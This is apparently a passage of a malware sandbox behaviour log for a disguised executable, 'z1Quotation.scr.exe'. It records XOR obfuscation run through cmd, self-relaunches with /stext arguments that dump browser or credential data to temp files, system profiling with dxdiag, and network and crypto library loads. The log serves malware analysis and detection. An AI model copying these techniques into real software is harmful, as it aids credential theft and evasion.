                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe "C:\Users\user\Desktop\z1Quotation.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txtJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\hhsvynxt"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xadmhfv"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\gymlnlyltcmojzwgtmnvsm"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: bcp47langs.dllJump to behavior
